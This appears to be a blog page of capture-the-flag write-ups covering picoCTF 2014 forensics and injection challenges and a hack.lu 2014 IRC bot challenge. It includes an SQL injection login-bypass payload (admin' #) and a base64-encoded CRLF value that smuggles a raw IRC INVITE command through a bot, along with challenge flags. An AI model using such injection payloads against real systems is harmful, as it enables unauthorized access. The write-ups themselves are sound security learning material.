root@kali:~/CTF/2014-picoctf/snapcat# ls
disk.img file.img output test
root@kali:~/CTF/2014-picoctf/snapcat# file file.img/
file.img/: directory
root@kali:~/CTF/2014-picoctf/snapcat# cd file.img/
root@kali:~/CTF/2014-picoctf/snapcat/file.img# ls
audit.txt jpg
root@kali:~/CTF/2014-picoctf/snapcat/file.img# cat audit.txt
Foremost version 1.5.7 by Jesse Kornblum, Kris Kendall, and Nick Mikus
Audit File

Foremost started at Mon Oct 27 20:23:29 2014
Invocation: foremost -i disk.img -o file.img
Output directory: /root/CTF/2014-picoctf/snapcat/file.img
Configuration file: /etc/foremost.conf
——————————————————————
File: disk.img
Start: Mon Oct 27 20:23:29 2014
Length: 5 MB (5242880 bytes)

Num Name (bs=512) Size File Offset Comment

0: 00000057.jpg 89 KB 29184
1: 00000237.jpg 13 KB 121344
2: 00000265.jpg 172 KB 135680
3: 00000613.jpg 34 KB 313856
4: 00000685.jpg 56 KB 350720
Finish: Mon Oct 27 20:23:29 2014

5 FILES EXTRACTED

jpg:= 5
——————————————————————

Foremost finished at Mon Oct 27 20:23:29 2014
root@kali:~/CTF/2014-picoctf/snapcat/file.img# ls
audit.txt jpg
root@kali:~/CTF/2014-picoctf/snapcat/file.img# cd jpg/
root@kali:~/CTF/2014-picoctf/snapcat/file.img/jpg# ls
00000057.jpg 00000237.jpg 00000265.jpg 00000613.jpg 00000685.jpg
root@kali:~/CTF/2014-picoctf/snapcat/file.img/jpg#

00000237

Injection1 – 90

Daedalus Corp. has been working on their login service, using a brand new SQL database to store all of the access credentials. Can you figure out how to login?

terminate SQL request with ‘# to bypass ( must be mysql )

use login:
admin’ #

error returns flag

Logged in!

Your flag is: flag_vFtTcLf7w2st5FM74b

 

PNG or Not? – 100

On a corner of the bookshelf, you find a small CD with an image file on it. It seems that this file is more than it appears, and some data has been hidden within. Can you find the hidden data?

image

run strings on image nothing important. Look at image via hex editor see proper PNG header and end. But more data after. Notice some flag.txt in the text

<hex editor image>

also notice 7z looks like a compressed file on the end.
tail end data off into another file and extract.
tail -c 138 image.png > test.7z

file test.7z
test.7z: 7-zip archive data, version 0.3

7z x test.7z

7-Zip [64] 9.20 Copyright (c) 1999-2010 Igor Pavlov 2010-11-18
p7zip Version 9.20 (locale=en_US.UTF-8,Utf16=on,HugeFiles=on,1 CPU)

Processing archive: test.7z

Extracting flag.txt

Everything is Ok

Size: 20
Compressed: 138
ls
flag.txt image.png test.7z
cat flag.txt
EKSi7MktjOpvwesurw0

 

 

 

Hack.lu 2014

This week my CTF team OverFlowSecurity was able to compete in hack.lu. This CTF seems to be very run and very challenging. Since this event was not over a weekend most our team could not commit a lot of time to it. We finished at a very respectable 80th place. I myself only concentrated on a single challenge based on an IRC bot. I actually learned a lot about how the IRC protocol works and in the end one of my teammates solved the challenge with our combined efforts. Below is a quick write up of the challenge. Next up for me is the PicoCTF in a week or so. It’s a long running (2 week) challenge.

 

Barmixing-Bot
by freddy (Misc)
200 (+80) Points

 

There’s a fun and quirky IRC bot to play with. It responds to commands in private chat but also in #hacklu-saloon on freenode. We think it’s involved in a devious scheme that distracts people to get their money pickpocketed. So be careful!

Bot was on an irc channel. Using !help in the channel or private message to bot gives you the list of commands accepted.

<barmixing-bot> Send messages to the bot or the channel starting with an exclamation mark. Known commands are list, status, karma, math, base64, base64d, rot13, ping, hack, request, list

Play around with commands for a while nothing of great interest. Using !base64 with a lot of characters showed it split the line into 2 lines. Spend some time on this.

Noticed that the bot is in a channel called #hacklu-secret-channel. This channel is invite only. So at this point I figured the goal was to get into this channel.

 

Also noticed this with the !rot13 function. Created a rot13 encoded string to send /invite H1tch #hacklu-secret-channel but this was just sent to the channel command not actually issued. Resorted to reading the RFC for IRC.

After reading docs and discussing my teammate suggested maybe we need to send the raw IRC commands to the bot. We had already been experimenting with the !base64d function that decoded base64 so we gave that a shot.

 

Encoded

aaa\r\nINVITE h1tch #hacklu-secret-channel

and sent to the bot via

!base64d YWFhXHJcbklOVklURSBoMXRjaCAjaGFja2x1LXNlY3JldC1jaGFubmVs

An invite was received by the bot and we were able to obtain the flag from the channel subject.

Flag GfeBNmN5XjwDvQB64qoqaEEeYogk4rGH3ikZ0qtc3B3HKLDoAH

Next Page